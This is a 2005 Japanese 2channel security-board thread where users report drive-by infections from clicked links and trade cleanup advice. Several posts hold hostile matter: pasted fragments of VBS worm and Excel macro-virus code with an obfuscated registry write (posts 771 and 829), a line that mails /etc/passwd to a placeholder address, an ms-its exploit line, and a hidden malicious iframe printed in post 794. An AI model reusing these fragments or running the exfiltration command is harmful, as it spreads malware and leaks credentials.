開いただけでウイルスに感染するページat SEC
開いただけでウイルスに感染するページ - 暇つぶし2ch715:名無しさん@お腹いっぱい。
05/02/02 10:40:53
URLリンク(users3.cgiforme.com)
ノートパソコンでここを開いたらいっぱい画面が出てきてしまい、
強制終了させられてしまいます。

どうしたらいいんでしょうか?
本当に困っています;;
もう簡単にURLふんだりしないので教えてください!
修理に出すしかないんでしょうか?;;

716:名無しさん@お腹いっぱい。
05/02/02 10:50:30
>>715
おめえバカだろ?
ウィンドウズアップデートはしていないは、
ウィルス対策ソフトはいれていないは

717:名無しさん@お腹いっぱい。
05/02/02 10:51:49
>>716
すみません。怒らないで。。
どうしたら良い?

718: ◆VIRUSzXyeo
05/02/02 10:59:08
>>715
ココ見ておいで。
エロサイト見たら…助けて下さい!Part49
スレリンク(pcqa板:-10番)

719:名無しさん@お腹いっぱい。
05/02/02 11:04:11
>>717
まず起動時にF8押してセーフモードで起動する
XPだろうから
C:\Documents and Settings\ユーザー名\Local Settings\Temp
C:\WINDOWS\Downloaded Program Files
これらのフォルダ内のファイルを全部削除
インターネット一時ファイルを全部削除
これをやってから、インストールされてしまったスパイウェアの駆除を始める
スレリンク(pcqa板:1-9番)


720:名無しさん@お腹いっぱい。
05/02/02 11:11:04
>>718
>>719ありがとう;;
頭いいしやさしいし。付き合いたいくらいだよ。
本当にありがとう。やってみます。

721:名無しさん@お腹いっぱい。
05/02/02 11:27:47
>>720

    〃                 i,        ,. -‐
   r'   ィ=ゝー-、-、、r=‐ヮォ.〈    /
    !  :l      ,リ|}    |. }   /   .や
.   {.   |          ′    | }    l
    レ-、{∠ニ'==ァ   、==ニゞ<    |    ら
    !∩|.}. '"旬゙`   ./''旬 ` f^|    |
   l(( ゙′` ̄'"   f::` ̄  |l.|   |     な
.    ヽ.ヽ        {:.    lリ     |
.    }.iーi       ^ r'    ,'    ノ    い
     !| ヽ.   ー===-   /    ⌒ヽ
.   /}   \    ー‐   ,イ       l    か
 __/ ∥  .  ヽ、_!__/:::|\       ヽ

722:名無しさん@お腹いっぱい。
05/02/02 11:28:53
>>720
さっさと直してしまいたい時
システムの復元

少しは勉強しとこうと思う時
テンプレを実行

723:名無しさん@お腹いっぱい。
05/02/02 11:30:56
>>722
理解しました。どうもありがとう。
ちゃんと勉強します。

724:名無しさん@お腹いっぱい。
05/02/02 19:37:22
最近2ちゃんのスレを開いたら警告が出てくるのですが、修復不可能且つウィルスへのアクセス拒否で
駆除をすることができません。bloodhound.Exploit6という名前です。

725:あぼーん
あぼーん
あぼーん

726:あぼーん
あぼーん
あぼーん

727:名無しさん@お腹いっぱい。
05/02/14 18:20:56
URLリンク(users3.cgiforme.com)


728:名無しさん@
05/02/15 13:37:37
セキュリティに詳しい方に御質問

私のPCがどうやらスパイウエアらしきものに感染?してしまったのですが、
駆除の仕方がわかりません。エクスプローラーを開くと
URLリンク(vv2.s13.tempx.cc)
↑が開き、英文でどうやら「あなたのPCはモニタリングされています」
といったような内容が書かれておるのですが、これは放置したままで
問題ないのでしょうか?教えて下さい。

729:名無しさん@
05/02/15 13:40:05
追記
ネットサーフィンするには、特に問題ないのですが、毎回上記の記載
したURLが出てくるので目障りです。
なんとかならないでしょうか、、、

730:名無しさん@お腹いっぱい。
05/02/16 08:01:38
URLリンク(qrl.jp)
↑はどうですか?
なんか血の涙を流してる女性の画像が出て
「ぎゃあああああああああああああああああああ」
って声が出て、
「あなたのPCは36時間以内に呪われます」
みたいなのがでたんですが。

731:名無しさん@お腹いっぱい。
05/02/16 17:17:56
>>728
とりあえずSpybot、Ad-Aware SE、CWShredder
を試してみたら?

732:コーラック ◆S2OnalVgus
05/02/17 03:34:07
ったまくるよぉ・・・・・
GoldenRetrivereだっけか?あんの野郎偽装ファイルまではいいけどSP2のダミーにリンク張ってるから
思わず削除してまったよぉぉおおお。
修復でリカバリできたからいいけど依存関係にまで手を加えれるものなんだろか?
くっそ~AltaVistaでLongHornなんて探すんじゃなかったよ・・・・

733:名無しさん@お腹いっぱい。
05/02/17 04:40:34
この前、「2ちゃんねるの こんな時計はイヤだ!その2」のどこかのリンクを踏んで、海外のホームページのフラッシュ画像を閲覧しただけで、
軽いウィルスに感染してしまいました。「Trojan.ByteVerify ウイルス」でした。ページを開いた途端にNorton AntiVirusがはじき、
「感染しています。」というメッセージが出てびっくりしました。その後、ウィルスチェックしてみると、IEの一時ファイルのところで
ウイルスが1つだけ見つかりました。もちろん駆除できましたが。
ウィルス対策ソフトを入れておいて本当に良かったです。あと少しで期限が切れますので、新しいソフト購入を検討してます。

734:名無しさん@お腹いっぱい。
05/02/17 10:54:08
>>733
NAV2005優待版買ってください。

735:名無しさん@お腹いっぱい。
05/02/19 22:57:00
>>732
買いますた

736:名無しさん@お腹いっぱい。
05/02/21 21:18:25
初めまして。ちょっと種類の違う質問ですがご了承ください。
Windowsとノートンのアップデートは最新版でウイルスチェックをして
「脅威は見つかりません」と出れば、もう安心してよろしいのでしょうか?
それともノートンで見つからない脅威もあるのでしょうか?

737:名無しさん@お腹いっぱい。
05/02/21 21:23:21
>>736
いっぱいあるわな
だから、予防の方が大切

738:736
05/02/21 21:48:48
>>737
そうなんですか…毎日アップデートはチェックしているんですが
今日ブラクラ踏んでしまって、Trojan byteVerifyってウイルスが
一時検出されました。
再起動して一時ファイル消してチェックしたところ、何も
検出されなかったので安心したのですが…油断しない方いいみたいですね。

739:名無しさん@お腹いっぱい。
05/02/24 02:13:48
Linuxユーザになってから、ブラクラもウィルスサイトも
踏んで踏んで踏みまくっている。Windows時代には怖くて
近づくことすら出来なかったサイトを、踏みまくって気分爽快。
俺の靴の底の味はどーよ?ってな気分だ。

740:名無しさん@お腹いっぱい。
05/02/24 02:19:31
>>739
グロ画像はOS何使っててもアウトだがな。

741:名無しさん@お腹いっぱい。
05/02/24 02:22:24
>>739
酷い目に合わされた過去への清算?なの...

742:あぼーん
あぼーん
あぼーん

743:名無しさん
05/03/03 00:18:42
>>738
そういう時こそ、HD革命WinProtectorを使ったら、再起動時に感染の痕跡まで消してくれるぜ。

744:名無しさん@お腹いっぱい。
05/03/03 00:41:40
このスレの「全部」部分をクリックすると、Avast!が警告を出すんですが?

745:名無しさん@お腹いっぱい。
05/03/03 00:50:01
URLリンク(ip3e83566f.speed.planet.nl)
踏んだんですけど、JS_PSYME.Vのウイルス(セキュリティーホールを
突いたWMP破壊スクリプト)が潜んでるらしいです。
このウィルスって
URLリンク(www.trendmicro.co.jp) (TrendMicro)
URLリンク(www.symantec.com) (symantec)
で検出できますか?検出されたときの対処法を教えてください

746:名無しさん@お腹いっぱい。
05/03/03 01:58:00
>>745
AntiVirというフリーソフトで検出できたヽ(´ー`)ノ


747:名無しさん@お腹いっぱい。
05/03/03 11:33:49
>>745
なんだ ノートンでもマカフィーでも検知するんじゃないかよ

748:名無しさん@お腹いっぱい。
05/03/03 11:37:04
>>745
随分と古いなあ
URLリンク(www.mcafeesecurity.com)

749:名無しさん@お腹いっぱい。
05/03/14 20:09:30
URLリンク(srd.yahoo.co.jp)

は平気で、しょうか?

750:名無しさん@お腹いっぱい。
05/03/14 22:12:02
ここは鑑定スレじゃないんだが。

つーか、ローマ字も読めないとは。

751:名無しさん@お腹いっぱい。
05/03/14 23:29:26
URLリンク(www.geocities.jp)

752:名無しさん@お腹いっぱい。
05/03/16 02:15:18
URLリンク(www.google.co.jp)

これ踏んじゃいました・・・。
周りのレスでウィルスだと騒がれていたのですが、やばいですか?
URLがGoogleのものだから大丈夫だと思ってなんの警戒もしてませんでした(^^;

753:名無しさん@お腹いっぱい。
05/03/16 04:23:08
初歩的なブラクラだな

754:名無しさん@お腹いっぱい。
05/03/20 01:36:41
>>749
鑑定はこっち
URLリンク(security.bbs.thebbs.jp)


>>752
※ Location ヘッダを発見しました。
※このアドレスは危険URLのひとつです。
URLリンク(www2.strangeworld.org)
ブラクラチェックを終了します。

だそうだ。ウイルスかと思ったらまず駆除ソフトを使うべす。
持ってなかったらノートン先生(2005)が1ヶ月お試し版あるから。
やばいかどうか鑑定なら>>754の最上部のアドレスへ。

755:名無しさん@お腹いっぱい。
05/03/20 02:16:02
URLリンク(213.159.117.133)
URLリンク(69.50.191.68)

756:名無しさん@お腹いっぱい。
05/03/24 10:20:53
ウイルスバスターを使っているのですが、ここにあるリンクを踏んだら感染しますか?

757:この板では鑑定はしません
05/03/24 10:32:40
この板では、鑑定はしないです。
鑑定して欲しい人は>>754の上のサイトか、
ラウンジ@2ch掲示板URLリンク(etc3.2ch.net)
勇気が無くて見られない画像解説スレ Part681
スレリンク(entrance板)l50へ。
スレが見つからないときはラウンジ板内を「勇気」「画像解説」などで検索。

>>756
鑑定スレではないのでご自分で試してください。自己責任で。

758:名無しさん@お腹いっぱい。
05/03/24 10:51:54
>>756
ウィンドウズアップデートしていないやつはすり抜けられたら
マジでスパイウェアを放り込まれる

759:名無しさん@お腹いっぱい。
05/03/24 10:54:56
>>752
<HTML>
<img src="sahra9714.jpg">
</HTML>

ソース こんなんでウィルス仕込めるかよ

760:名無しさん@お腹いっぱい。
05/03/24 11:08:47
だから相手するなよ。鑑定スレじゃないんだから。
ウィルス食らった(かも知れない)香具師は質問スレへどうぞ。

761:名無しさん@お腹いっぱい。
05/03/26 19:49:31
URLリンク(www2.strangeworld.org)

ブラクラチェッカーで確認
URLリンク(www.7walker.com)
> ※このアドレスは危険URLのひとつです。
> 注意!アラートオープンを発見! (3)
> 注意!ループタグを発見! (2)
> 危険!mailtoストームを発見! (380)
> 危険!無限ループを発見! (2)
> 危険!Telnetストームを発見! (3)

762:名無しさん@お腹いっぱい。
05/03/27 03:10:13
>>733
V3ウィルスブロック2005を購入しました。その代わり、ファイアーウォールの監視が
厳しくなりましたが、ウィルスに感染するよりはマシだと観念しました。

763:名無しさん@お腹いっぱい。
05/03/28 15:08:33

URLリンク(oss.jodi.org)

764:名無しさん@お腹いっぱい。
05/03/28 19:28:53
URLリンク(omanko45.tvheaven.com)

765:名無しさん@お腹いっぱい。
05/03/28 19:57:53
これって何?

URLリンク(www12.plala.or.jp)


766:名無しさん@お腹いっぱい。
05/04/06 20:42:15
URLリンク(gazo03.chbox.com)

767:nec
05/04/06 20:46:12
URLリンク(virus.bcasj.or.jp)
これってウィルスですか。

768:名無しさん@お腹いっぱい。
05/04/09 19:38:30
URLリンク(www.medianetjapan.com)

さきほど、これを踏んでえらい事になったんですけどやはりウィルスですか?

769:名無しさん@お腹いっぱい。
05/04/09 20:29:41
>>765
ウホッ

770:あぼーん
あぼーん
あぼーん

771:名無しさん@お腹いっぱい。
05/04/16 19:20:05
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

772:名無しさん@お腹いっぱい。
05/04/17 13:42:39
URLリンク(lolworld.ecstazy.info)

773:名無しさん@お腹いっぱい。
05/04/18 01:22:50
糞炉利サイト死ね!!!11!1!!勝手に飛ばすなボゲェェェェ!!!

774:名無しさん@お腹いっぱい。
05/04/20 23:13:45
URLリンク(www.tiduru.sytes.net)

775:名無しさん@お腹いっぱい。
05/04/21 09:38:58
 

776:名無しさん@お腹いっぱい。
05/04/29 13:01:32
URLリンク(www.town.kashimadai.miyagi.jp)
地方自治体の公式ページなんだけど、下のほうにある掲示板をみると反応します。

777:名無しさん@お腹いっぱい。
05/04/29 13:03:17
>>768
※このアドレスは危険URLのひとつです。
危険!Telnetストームを発見! (400)

778:名無しさん@お腹いっぱい。
05/04/30 14:10:47
>>776
一回目はjavascripを使ったウイルスで10個来た。
もう一回踏んでみると、HTML_REDIR.A コレだ!
まぁセキュリティソフト入ってるんなら入っても問題なし。
PCがガリガリいうだけ

779:名無しさん@お腹いっぱい。
05/04/30 14:24:49
>>776
海外アダルトが出てくるなwなかなか粋なHPだ

780:名無しさん@お腹いっぱい。
05/05/06 21:12:09
ノートン入れた状態でここ開くと五月蝿いですよね。

781:名無しさん@お腹いっぱい。
05/05/06 21:19:26
URLリンク(138.139.148.210.dy.bbexcite.jp)
おkwwwうぇうぇっおkwwwおkwっwうはっっおk
wっおkwwwwwwwっwwwwwwwwwwww
っwwwwwwwwwwwwwwwうぇうぇwうはっ
うぇwwwwうはっwwwwwwwwwうはっwっ
うぇおk

782:名無しさん@お腹いっぱい。
05/05/10 20:55:59
URLリンク(www.pornbook.net)

これ踏んでえらいことになったんですけど、ここで感染するウイルス達って
PC内のいろんなデータを外部に流出する類のやつなんでしょうか?
教えてください。

783:名無しさん@お腹いっぱい。
05/05/10 21:40:52
>>782
うちでは何ともならないが?


784:名無しさん@お腹いっぱい。
05/05/10 21:44:58
>>782
たぶんトロイだろう
こっちで調べたらとりあえず"Trojan.Win32.StartPage.pz."なんてのが引っ掛かった

785:名無しさん@お腹いっぱい。
05/05/10 21:53:48
>>782
JAVA_BYTEVER.Aてのが3個

786:名無しさん@お腹いっぱい。
05/05/15 07:54:00
このスレにはったあるのでノートンやバスターをかいくぐり
windowsの動作に影響を及ぼすサイトってある??

787:名無しさん@お腹いっぱい。
05/05/16 14:40:17
 

788:名無しさん@お腹いっぱい。
05/05/16 14:45:53
価格comがやばいらしい。

789:名無しさん@お腹いっぱい。
05/05/16 21:34:22
URLリンク(www.prenavi.net)
Trojan.AnicmooとTrojan.ByteVerifyが見つかったんだが、どこに仕掛けてあるんだ?

790:名無しさん@お腹いっぱい。
05/05/20 20:59:03
AVGで片っ端から踏んだけど何もでないや??

791:名無しさん@お腹いっぱい。
05/05/20 23:04:12
そりゃ糞いや。

792:名無しさん@お腹いっぱい。
05/05/21 00:20:13
>>790
まさにWindows Updateに救われているソフトですな

793:名無しさん@お腹いっぱい。
05/05/21 12:23:04
この板のトロイの木馬2台目というスレで即ノートン先生が検出したぞ!
ウィルス張ったやつ市ね。

794:名無しさん@お腹いっぱい。
05/05/21 12:27:52
>>789
<HTML lang="ja">
<HEAD><TITLE>画像掲示板(Light)</TITLE>
<STYLE>
</STYLE>
</HEAD>
<BODY BGCOLOR="#FAF0E6" BACKGROUND="" TEXT="#2F4F4F" LINK="#6060FF" VLINK="#4040FF">
<BR>
<FONT SIZE="+1" COLOR="#FF0000"><B> </B></FONT>
名前:<FONT COLOR="#00FF00"><B> </B></FONT>
[2005/05/08,11:10:23] No.271 <a href="imgboard.cgi?bbsaction=disp_rep_form&amode=&page=1&blood=20050508111023&parent=271">返信</a>
<BLOCKQUOTE><!-- body_start -->
<a target="_blank" href="URLリンク(lol.to)">HOT PUSY</a><br><BR>URLリンク(lol.to)
<iframe src="URLリンク(www1.pimpspace.com)" height="1" width="1"></iframe><!-- user: ?igip-fo.rzone.de-->
</BLOCKQUOTE>
</BODY>
</HTML>

795:名無しさん@お腹いっぱい。
05/05/21 12:38:14
>>789
腐れにちゃんが! この程度のソースくらい投稿させろや
このソースの一部で反応するから、html保存して実行してごらん

URLリンク(81.222.131.59)
URLリンク(81.222.131.59)
URLリンク(205.252.250.226)

いわゆるこれらのファイルを読み込んで実行しようとしている

つまり、これら画像プレビュー表示のある掲示板だと、
表示しただけでIEの脆弱性を利用される事になるから、
Windows Updateしていないくて
使っているウィルス対策ソフトもスルーした場合、
ウィルスのインストーラーが実行されてウィルスに感染する事になる。

削除しない管理人は、これらの脆弱性に対して無知なんだろうけどな!
わざとかもしれないけどな

796:名無しさん@お腹いっぱい。
05/05/21 12:56:44
age

797:名無しさん@お腹いっぱい。
05/05/21 13:15:45
この脆弱性を利用された場合、これらを利用するDownload Ject関連の脆弱性を残したままでいると、
ウィルスだけじゃなくて、仕込んだやつに知識があってプログラムも書けるやつだと、
コンピュータ内のファイルを切り刻んだり、システムファイルを消してしまったり、
実際に何でも可能で悪質なプログラムを実行されてしまう。

798:名無しさん@お腹いっぱい。
05/05/21 21:21:55
>>795
URLリンク(205.252.250.226)

こっちが今ダウンロードされるようになっているらしい

799:名無しさん@お腹いっぱい。
05/05/22 05:00:20
>>795のサイトは死んでいたりする時もあって悪質だな
今は生きているわ

800:名無しさん@お腹いっぱい。
05/05/22 16:26:15
>>789
ウイルスバスターで踏んでみたけどHTML_REDIR.Aしか検知しなかったorz

801:名無しさん@お腹いっぱい。
05/05/26 11:04:38
URLリンク(cgi36.plala.or.jp)

ここ踏んじゃったんですけど、ウイルスありますか??

802:名無しさん@お腹いっぱい。
05/05/26 11:29:32
>>801
この板では鑑定はしない。自分でウィルススキャンするか、
ラウンジ@2ch掲示板URLリンク(etc3.2ch.net)
勇気が無くて見られない画像解説スレ Part704
スレリンク(entrance板)へ。

803:名無しさん@お腹いっぱい。
05/05/26 11:31:40
>802
わかりました。
どーもです。

804:名無しさん@お腹いっぱい。
05/05/28 14:40:29
すいません教えてほしいのですがブラクラふんでしまい
ウイルスアラートがでてしまったのですがひとつウイルスが削除できません
でしたみたいなのがでたんですがどうしたらいいでしょうか?
トレンドでオンラインスキャンしたらHTML_REDIR.Aというウイルスでした
ウイルス対策ソフトはVirus scanの最新版をつかっても
アラートに反応しませんでした
パソコン初心者なのでどうしたらいいかわからません
ウインドウズXPですああぁ~どうしよう・・・・
誰か教えてください・・・・

805:名無しさん@お腹いっぱい。
05/05/28 15:12:36
URLリンク(www.prenavi.net)

806:名無しさん@お腹いっぱい。
05/05/28 15:48:20
URLリンク(www.prenavi.net)

807:名無しさん@お腹いっぱい。
05/05/28 20:30:57
インターネットオプションのファイル削除でキャッシュファイルを削除すれば、多分消えるぞ!
クッキーも念のため消してくれ
それでも、だめなら感染したファイルを手動で消してくれ。

808:名無しさん@お腹いっぱい。
05/05/28 22:20:46
スレリンク(koumu板)l50

809:名無しさん@お腹いっぱい。
05/05/29 17:44:22
>>804
パソコン、買い替えだね。
あと、すでに知人から恨まれているはずだから、皆に謝っておくように

810:名無しさん@お腹いっぱい。
05/05/29 17:56:08
>>804
URLリンク(www.trendmicro.co.jp)
たいしたことないじゃん。

811:名無しさん@お腹いっぱい。
05/05/29 21:06:14
あのう
声優板を見ようとすると、それだけで
Nortonがウイルスを検知するんですけど、これはいったいどーゆー事でしょうか?

812:名無しさん@お腹いっぱい。
05/05/30 00:25:20
このページ開いたら俺のNOD32が反応したんだが、どこぞのカキコですか?

813:名無しさん@お腹いっぱい。
05/05/30 03:23:48
>>784の"Trojan.Win32.StartPage.pz.に感染してしまったのだがどうしたらいいのでしょう?

ちなみにSD画像掲示板って所を開いただけで感染しますた。

814:名無しさん@お腹いっぱい。
05/05/30 21:06:14
>>813
URLリンク(www.trendmicro.co.jp)
コレと同じものかも。

815:名無しさん@お腹いっぱい。
05/05/30 21:45:27
URLリンク(www.cjinternet.jp)
(↑ cjインターネットジャパン、ここの
URLリンク(game.netmarble.jp)
↑ここを開いたら
VBが TSPY_LINEAGE.AP を見つけるのよね。。。

コレって・・・どうなの?


816:名無しさん@お腹いっぱい。
05/05/30 21:48:59
>>815
火狐では表示されない

817:名無しさん@お腹いっぱい。
05/05/30 21:55:28
iframeでなんか仕込んであるようだがスクリプト読むの('A`)マンドクセ

818:名無しさん@お腹いっぱい。
05/05/30 22:38:01
>>815
スクリプトで引っ掛かるようなものなんてないね
誤認
Activexコントロールインストールのポップアップに反応しているのかも?

819:名無しさん@お腹いっぱい。
05/05/31 00:36:07
>815
フリーのゲームサイトでこんなのほっとくとわ
さすがキムチの国ですよね

820:名無しさん@お腹いっぱい。
05/06/01 06:38:07

※緊急※

第二の価格コム事件とも言える「ozmall」のサーバがクラックされた事件の場合では、
現時点でマカフィーとアンラボ製品が問題のウイルスを検出できてます。
URLリンク(www.ozmall.co.jp)
                       検出 駆除
マカフィー(Managed VirusScan)    可   可
アンラボ(V3ウイルスブロック2005)  可   可
NOD32                   不能 不能

821:名無しさん@お腹いっぱい。
05/06/03 01:39:31
宣伝おめ

822:名無しさん@お腹いっぱい。
05/06/03 02:27:42
nyでDLしたファイル(H系)解凍した瞬間にCドライブ内のJPEGとZIPファイルが全部壊れました。
容量が全部26KBになってました。ny見てみたらノード情報のとこに「ぬるぽ」と「ガッ」のAAが…
その後ny起動させても全く動きません。新しくny本体をDLして前と同じ設定しても動きません。
ウイルスバスターで検索してもなにもひっかかりません。nyが動かない以外は別に何も症状ないんですが…
誰か詳しく教えてください、よろしくお願いします…


823:名無しさん@お腹いっぱい。
05/06/11 14:21:52
>>822
最インスコ

824:名無しさん@お腹いっぱい。
05/06/14 00:45:31
何が凄いってこのスレをIEで開いた時に警告が出てしまった事。
avastってそれなり?

825:名無しさん@お腹いっぱい。
05/06/14 14:50:26
上げ

826:名無しさん@お腹いっぱい。
05/06/14 17:55:29
半角2次元板を開くと
Bloodhound.Exploit.6ってのを検知したんですが・・・。
2回やってみましたがノートン先生が2回検知しました。

827:名無しさん@お腹いっぱい。
05/06/14 19:01:22
これか。 半角系狙われてんなぁ
スレリンク(ascii2d板)

>>826
専用ブラウザlive2chとノートンを使ってる方へ
スレリンク(ascii板)

828:名無しさん@お腹いっぱい。
05/06/17 21:26:27
ソースとAVGを入れて「782」のURLを踏んでみたら,
AVGの方が反応しました。S社の性能はフリー以下なんでしょうか・・・?

829:名無しさん@お腹いっぱい。
05/06/21 13:36:19
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
kak.hta';ken=wdt'START

Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10

End Sub


830:名無しさん@お腹いっぱい。
05/06/21 13:49:41
>>828
片方のAVに引っ掛かったら普通はもう片方には引っ掛からないものなんだが…
いやそれ以前に、ソースとAVGを同居させてるのか?
(複数の常駐型AVの同居は原則的にタブー)

831:名無しさん@お腹いっぱい。
05/06/21 14:24:30
>>828
仕様的には片方がブラウザでの実行を阻止した時点で、もう一方はそのファイルへのアクセスを
OSに排他処理されてしまうので検出すら出来ない。
しかし、S社のソフトはDownload Jectの脆弱性を攻撃するスクリプトファイルを
まず、ほとんど検出しない。
「ウィンドウズアップデートしろよ!」の姿勢なんだろう。
だが、セキュリティソフトとしては失格である。

832:名無しさん@お腹いっぱい。
05/06/27 08:58:16
URLリンク(www.nas.co.jp)
ブラウザの設定が関係しているのかもしれないが
ここにアクセスすると勝手に無限リロードが始まるw

833:名無しさん@お腹いっぱい。
05/06/28 01:00:58
困ってますお願いします。
2ちゃんの懸賞板で張ってあったこのリンクをクリックしたら

URLリンク(www.porn-news.net)

TAROJ_SMAL.STというファイルがトレンドマイクロのオンラインスキャンを
したら検出しました。

それで、システムの復元をしてもエラーで復元できず、
IEを開くたびに変な広告サイトやアダルトサイトが表示されてしまって
困ってます。
どうしたらいいのかまったく分からないので教えていただけないでしょうか。。

OSはウインドーズMEです。よろしくおねがいします


834:名無しさん@お腹いっぱい。
05/06/28 01:17:14
>>833
URLリンク(www.trendmicro.co.jp)
これとおなじらしい

835:名無しさん@お腹いっぱい。
05/06/28 01:29:58
>>834
そうなんですがどうしたらいいのでしょう・・
やっぱりウイルスバスターとか買わないとダメなのかな。不安です。。

836:名無しさん@お腹いっぱい。
05/06/28 01:31:56
834さんよる遅くにレスありがとうございます。

837:名無しさん@お腹いっぱい。
05/07/02 12:56:01
>>789
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
Win32/TrojanDownloader.Ani.C トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
Java/Exploit.Bytverify.F トロイ     切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
複数のウイルス切断されました

一応12個くらい見つかった。NOD32でアドバンストヒューリスティック機能有効。

838:名無しさん@お腹いっぱい。
05/07/07 23:22:29
硫黄

839:あぼーん
あぼーん
あぼーん

840:名無しさん@お腹いっぱい。
05/07/10 19:19:15
↑何を書いてたんだろ?

841:あぼーん
あぼーん
あぼーん

842:名無しさん@お腹いっぱい。
05/07/14 05:22:20
逝ってらっしゃい
URLリンク(195.225.177.38)
URLリンク(bbs.fozya.com)

843:あぼーん
あぼーん
あぼーん

844:名無しさん@お腹いっぱい。
05/07/15 19:36:56
URLリンク(porn.popon.cn)
上らへんをクリックすると…

845:名無しさん@お腹いっぱい。
05/07/16 19:45:29
あげ

846:名無しさん@お腹いっぱい。
05/07/16 20:33:03
スレリンク(sec板)
を開いたら感染しました!!!!!!111

847:名無しさん@お腹いっぱい。
05/07/16 21:14:07
>>844
危険!このアドレスはワンクリック詐欺サイトのひとつです。
注意!Set-Cookieが使われています。
注意!PHPに対応したサーバーです。
フィッシングチェックが終了しました。
[フィッシング詐欺などの可能性(Beta-Test) : 100%]


848:名無しさん@お腹いっぱい。
05/07/17 15:37:18
>>842
上のアドレスは36個も反応してくれたぞ。
NOD32(アドバンストヒューリスティック機能有効)

849:名無しさん@お腹いっぱい。
05/07/19 23:44:12
>>847
ワンクリック詐欺用だから危険でも何でもないと思うけどね、今時。

ファイルのダウンロードの時もどきの画面が出るんで、「何かインストールしてしまった?」
みたいな錯覚を起こさせる狡猾な詐欺ではあるね。
ただスピードが笑っちゃうね、1Mbpsで接続してんのに2.7Mbpsとかだし、
MeとかでもXPのデザインだしね。


850:名無しさん@お腹いっぱい。
05/07/24 11:57:32
URLリンク(mahoro.ddo.jp)
↑ここでIEが壊れたみたいなんですけど、直し方教えて頂けませんか・・
OSは2Kです。

851:名無しさん@お腹いっぱい。
05/07/24 12:45:25
>>850
そこで何をしたらどうなったのか書かんと誰にも対処のしようがないぞ
そこのページ自体は何の変哲もなさそうだしな

852:名無しさん@お腹いっぱい。
05/08/07 19:09:15
URLリンク(ck.jp.ap.valuecommerce.com)
ここを踏んでから時々URLをクリックしたりブラウザを閉じようとすると
RPCRT4.DLLエラーと出てInternetExplorerが強制終了されるようになりました
何か対処法はありますか?

853:名無しさん@お腹いっぱい。
05/08/29 20:10:47
ウイルスセキュリティでここを開いたら,ウイルスだと反応しました。

854:名無しさん@お腹いっぱい。
05/08/30 15:09:03
URLリンク(www.hellplant.org)
踏みました…。どの程度のヤバさでしょうか?

855:名無しさん@お腹いっぱい。
05/09/04 19:39:46
URLリンク(bohemiansuzuki.bravehost.com)

これ踏んでしまいました。ノートンでは削除・検疫できないと表示されます。ヤバイですか?

856:名無しさん@お腹いっぱい。
05/09/06 20:39:41
趣旨とは違うが
中国 やふーに行って 天安門 などを検索 すると
2回目以降で.......

857:名無しさん@お腹いっぱい。
05/09/12 01:40:50
>>854
通称「厨房ホイホイ」・・・(w

858:名無しさん@お腹いっぱい。
05/10/01 14:08:39
◆Yw2l5Bi7Kg ←こいつにウイル○攻撃を…頼んだ…

スレリンク(lic板)

859:名無しさん@お腹いっぱい。
05/10/02 03:41:04
怖いですねー。

860:名無しさん@お腹いっぱい。
05/10/02 07:36:48
URLリンク(www.grannymax.com)
これひらいたらクラッチャッタヨ;;
どうしたらいいのか教えてホチィホチィ(´・ω・`)



861:名無しさん@お腹いっぱい。
05/10/02 08:46:23
>>860
OS再インスコ

862:名無しさん@お腹いっぱい。
05/10/02 11:44:42
>>861
サンクス
それしか方法ないのですか
CDさがしてきも(´・ω・`)

863:名無しさん@お腹いっぱい。
05/10/02 23:44:09
URLリンク(www.unko.com)


糞ヤバ。


864:名無しさん@お腹いっぱい。
05/10/03 15:20:03
激ヤバ !!

操作不能。

URLリンク(upld2.x0.com)

865:名無しさん@お腹いっぱい。
